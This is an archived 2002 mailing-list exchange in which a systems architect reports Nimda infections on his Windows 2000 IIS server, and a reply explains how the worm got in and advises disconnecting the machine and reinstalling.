Reformat the machine. I'M NOT KIDDING. The recommended way to recover from a Nimda comprimise is to reformat reinstall. Once Nimda has infected IIS, it will most likely have infected your mmc.exe, riched20.dll, and a whole lot of other stuff. Guest is most likely now an administrator of your box. Look at your shared drives - you'll notice they are open with full write to all network users.
You were most likely infected because you did not code-red patch your IIS. Nimda initiated a malformed tftp request and sent the admin.dll file into some dir on your webserver. Then your webserver infected your whole computer. Disconnect it from the network immediately. It is scanning the local network for open shares and spitting out those eml files like crazy. Sorry, but you're pretty much screwed. If the data is important, pull the hard drive out and put it in another computer that has the latest and greatest in virus protection. http://www.cert.org/advisories/CA-2001-26.html -----Original Message----- From: Gregory J Toland [mailto:[EMAIL PROTECTED]] Sent: Wednesday, February 27, 2002 6:34 PM To: NT 2000 Discussions Cc: Gregory John Toland Subject: Infected W2K Server I went on travel this past weekend only to return and find my computer was infected with three types of Nimda viruses. Specifically, they are 1. W32.Nimda.A@mm (dll) virus. 2. W32.Nimda.E@mm (dr) virus. 3. W32.Nimda.A@mm (dr) virus. 42 files were infected. 18 files were in C:\Inetpub\scripts\ and were all named like... C:\Inetpub\scripts\TFTP860 C:\Inetpub\scripts\TFTP952 I have no idea where these files came from. 18 other files came from C:\WINNT\Temp\ and were all named like... C:\WINNT\Temp\mep914.tmp.exe C:\WINNT\Temp\mep916.tmp.exe Again, I have no idea where these came from. Finally, four files that I would have thought would have been installed in a different directory were... C:\Admin.dll C:\httpodbc.dll D:\Admin.dll D:\httpodbc.dll Norton Antivirus could not repair them. They have all been quarantined. What happened? I was going to anyways uninstall IIS5 from the C: drive and install it on the D: drive. Will this fix any potential problems my computer may have down the road. Is this false reporting on Norton's part? Please enlighten me! :) Gregory J Toland Sr. Systems Architect XWare Systems Inc. 1643 South Tenth Street Arlington, VA 22204 (703) 979-8378 (Office) (703) 655-5766 (Mobile) [EMAIL PROTECTED] ------ You are subscribed as [EMAIL PROTECTED] Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe send a blank email to [EMAIL PROTECTED] ------ You are subscribed as [email protected] Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe send a blank email to [EMAIL PROTECTED]
